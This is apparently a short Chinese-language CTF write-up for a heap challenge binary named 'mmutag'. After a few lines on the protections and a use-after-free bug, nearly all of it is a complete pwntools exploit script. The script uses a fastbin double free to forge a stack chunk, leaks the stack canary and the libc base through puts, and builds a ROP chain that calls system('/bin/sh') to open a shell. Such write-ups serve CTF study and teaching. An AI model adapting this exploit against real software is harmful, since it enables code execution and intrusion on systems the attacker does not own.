libc给的是2.23


pie没开 RELRO没开全。

栈地址堆地址都给了。

两个功能

1

2
主功能的free函数有uaf。

直接利用就好。

exp

from pwn import *
context(os='linux', arch='amd64', log_level='debug')

r = process("./mmutag")
elf = ELF("./mmutag")
libc = ELF("./libc.so.6")

def menu(idx):
    r.recv()
    r.sendline(str(idx))

def delete(idx):
    menu('2')
    r.sendline(str(idx))


def new(idx,content):
    menu('1')
    r.recv()
    r.sendline(str(idx))
    r.recv()
    r.send(str(content))


r.recv()
r.send("\n")
r.recvuntil("this is your tag: ")
addr = eval(r.recv(14))
success("stack_addr: " + hex(addr))
fake_size = addr - 0x40
r.recv()
r.sendline("2")
new(1,'a')
new(2,'a')
delete(1)
delete(2)
delete(1)
new(3,p64(fake_size))
new(4,p64(fake_size))
r.recv()
r.sendline('3')
r.sendline('a'*0x18)
r.recvuntil('a'*0x18+'\n')
canary = u64("\x00"+r.recv(7))
new(5,'a')
layout = p64(0)+p64(0x71)+p64(0)
r.recv()
r.sendline('3')
r.sendline(layout)
payload = "a"*0x8 + p64(canary) + p64(0)
payload = payload + p64(0x400d23) + p64(elf.got['puts']) + p64(elf.plt['puts'])
payload += p64(0x400bf1)  # main
new(6,payload)
r.sendline('4')
r.recvuntil("please input your choise:\n")
libc_addr = u64(r.recv(6).ljust(8,"\x00")) - libc.symbols['puts']
success("libc_addr: " + hex(libc_addr))
r.send("\n")
r.sendline("2")
delete(3)
delete(4)

delete(3)
new(7,p64(fake_size-0x10))
new(8,p64(fake_size-0x10))
r.recv()
r.sendline('3')
r.send(p64(0)+p64(0x71)+"/bin/sh\x00")
new(9,'a')
payload = "/bin/sh\x00" + p64(canary) + "/bin/sh\x00"
payload += p64(0x400d23) + p64(fake_size+0x10) + p64(libc_addr + libc.symbols['system'])

new(10,payload)
r.recv()
r.sendline('4')
r.interactive()